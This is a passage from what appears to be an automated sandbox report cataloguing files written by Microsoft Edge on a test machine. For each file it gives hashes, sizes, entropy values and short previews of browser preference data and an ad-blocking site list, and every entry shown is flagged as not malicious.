                                                                                                                                                                                                                                                                                                                            SHA1:5E7E9C7ADDF7B0FDED1936FA44956C19CA145551
                                                                                                                                                                                                                                                                                                                            SHA-256:9BAF469AC0EA90226AA775F694CA28861814E287A1FD38B1B42ABEE8AD8726F4
                                                                                                                                                                                                                                                                                                                            SHA-512:338227416862A2BCC1BA65CD86E7DD6F41468264E98288E44A626D4586C09CEEE9C6B093FA1F6D94C290C218CE7DB4617447C471B26D4BB5D13C186394B2DEC4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380536356069078","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"a6af39e6-c924-4f34-9fc9-59402c77a417"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4285ad63-dbfb-4bac-a145-0d0b8bc7a1a5.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):54541
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.069802723427415
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:jMkbJrT8IeQc5dKqpQi1zNtx8Mr9Nziifvn+IsGSFDFcPVcz09N2aPeCioPJDSgz:jMk1rT8H1KuhVlf98aPeFoPtSmd6qE7w
                                                                                                                                                                                                                                                                                                                            MD5:A050DE159C2058EE364E0E17899AA65E
                                                                                                                                                                                                                                                                                                                            SHA1:28D20D928ABA46E15C93687D581D8CF7D50F4975
                                                                                                                                                                                                                                                                                                                            SHA-256:787F77E07F6093024888067222A43A76E8B8FB6C4D22B7AA426AA425A5F52B90
                                                                                                                                                                                                                                                                                                                            SHA-512:6395192BBE0542BA34295C1A123AD355318FD8448F4627949FF9269212C89130F3414F69F7B4E4FF67344B5F9ECEBC172FBB619BAB23C32F80DB8B3E11A95397
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380536356069078","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"a6af39e6-c924-4f34-9fc9-59402c77a417"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\53b54e85-d6f3-4098-b521-cbd074195a31.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):54541
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.069802723427415
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:jMkbJrT8IeQc5dKqpQi1zNtx8Mr9Nziifvn+IsGSFDFcPVcz09N2aPeCioPJDSgz:jMk1rT8H1KuhVlf98aPeFoPtSmd6qE7w
                                                                                                                                                                                                                                                                                                                            MD5:A050DE159C2058EE364E0E17899AA65E
                                                                                                                                                                                                                                                                                                                            SHA1:28D20D928ABA46E15C93687D581D8CF7D50F4975
                                                                                                                                                                                                                                                                                                                            SHA-256:787F77E07F6093024888067222A43A76E8B8FB6C4D22B7AA426AA425A5F52B90
                                                                                                                                                                                                                                                                                                                            SHA-512:6395192BBE0542BA34295C1A123AD355318FD8448F4627949FF9269212C89130F3414F69F7B4E4FF67344B5F9ECEBC172FBB619BAB23C32F80DB8B3E11A95397
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380536356069078","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"a6af39e6-c924-4f34-9fc9-59402c77a417"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9763c2f0-e62f-48c2-a7ab-cca191a6d320.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.0897618280562025
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWFdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn76kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:5F854A8D2611A5343EE1A76398D58238
                                                                                                                                                                                                                                                                                                                            SHA1:050716CB313162D10F7E547CE9888384ABB0F29C
                                                                                                                                                                                                                                                                                                                            SHA-256:CD836B130214BF743841EAC81527E95EEC1208B322222E9985E267D3096ADD0A
                                                                                                                                                                                                                                                                                                                            SHA-512:21E713F95983C6CC2444EB33D6A165463E9BF3DFC8965A46E5215BB734C4136A6A1C59B97DF5383D4ADA31B67400FBE538BFB25E2C6F4B26A6B8A9C12027C248
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):107893
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                                            MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                                            SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                                            SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                                            SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\ec86e95f-0180-45f9-afd1-21bc2f2226ae.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):107893
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                                            MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                                            SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                                            SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                                            SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):280
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.105637406271287
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHL:o1cUh4Y3LbO/BVsJDbYuDRBOyc
                                                                                                                                                                                                                                                                                                                            MD5:CFE6AA5BB3888F03C04999ADA5DF1C0A
                                                                                                                                                                                                                                                                                                                            SHA1:2F1E4316C1611F3B1E2117090E5E9D177EE6ABF5
                                                                                                                                                                                                                                                                                                                            SHA-256:CB2A3986B16815762A2ABF3D5FAD6B35D13BDC6DC2FAE081F1DD1D94DA1E479A
                                                                                                                                                                                                                                                                                                                            SHA-512:FF824C1A2BA5788461B7762726C869767BC70B163ABBBBA0AA7430999DA31223E487802955627C4F6EB8ACCA15A5B98F35E80B59D9E5AF85E6308DA1A7B323EF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\446d8c37-4d1c-4899-8067-9f96613b67a1.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):9767
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.115830386981659
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:stKkdwCsRxPaFvrE9klzws8JbV+FZBQAWUuPSYJ:stKisRxPCDnsbGvQI8
                                                                                                                                                                                                                                                                                                                            MD5:C81ABF84F706C820FCD4AEE149A2B343
                                                                                                                                                                                                                                                                                                                            SHA1:276886C46577805979D8C56994CEB48A900ED5BA
                                                                                                                                                                                                                                                                                                                            SHA-256:8A930B277D9EC34E882CDF04A5219C99951CFE85F5B618CCB7E3372A60FCB391
                                                                                                                                                                                                                                                                                                                            SHA-512:5F14830AA6D273180A779DBE9E36D593802A0881EE1886DAEEA220A4090122906B358F899E8E62B174F33F2314B2043ADFE82C3B092BC2BD7731C0F598E706DB
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380536355952736","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":853,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed"

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6b3b807a-24a2-4288-a538-49b62b669ea7.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (17904), with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):17907
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.488114746756104
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:stKJ99QTryDiuabatS4wys5Qc/xPaFvrEspklz2YKN/lQmDa+LDjZs8JbV+FtBQD:stKPGQSQs5Qc/xPCDxWLmDhrhbGTQIY
                                                                                                                                                                                                                                                                                                                            MD5:EC8AF977DA3ECAB961EA85EAFD186DB7
                                                                                                                                                                                                                                                                                                                            SHA1:8D18930330AD684520ADB44AED15C8DFB2F4CB66
                                                                                                                                                                                                                                                                                                                            SHA-256:9D58AF9D9D2DB24226CDE7A1DE0B76356B5F1C7D7ABAB4571755ECAA2B68051A
                                                                                                                                                                                                                                                                                                                            SHA-512:A0E96FF6179A2C8C20E6BEFB66A100E64B2963013CA513A94AA37C543402065FAC643AA9DE0D9167465122593640C7EA0857E42D0A182F4A42050AAA13DFD730
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380536355952736","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8385f731-ed9b-4b06-900a-71ba834c87b7.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):115717
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                            MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                            SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                            SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                            SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9c082b13-d807-4429-86b8-ec0dc1e903f3.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.566919002467983
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:nTffQHWjvW5wFZf4XS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPmWIY1w0rwXJpFtuc:n7YH+vWaFZf2Su1jajsWt1tT
                                                                                                                                                                                                                                                                                                                            MD5:ED02A1871812F1497C6C6F565964D481
                                                                                                                                                                                                                                                                                                                            SHA1:CFE4CD7190FBF2DA09DFEA9102802EC8672C6866
                                                                                                                                                                                                                                                                                                                            SHA-256:794FC618C5A7288315A5CD7601825846CB1C52790686F97A674D1F7647336BE4
                                                                                                                                                                                                                                                                                                                            SHA-512:BD29C1ED13BD9408115F318D7592DE8A69034AF4FDCAD660EE0214EFC6254F4F27202CBA479F6CC5E42BEC3D215E98CB00401823C5C84CC1619C315B9D9E4515
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380536355309336","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380536355309336","location":5,"ma

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):33
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                                            MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                                            SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                                            SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
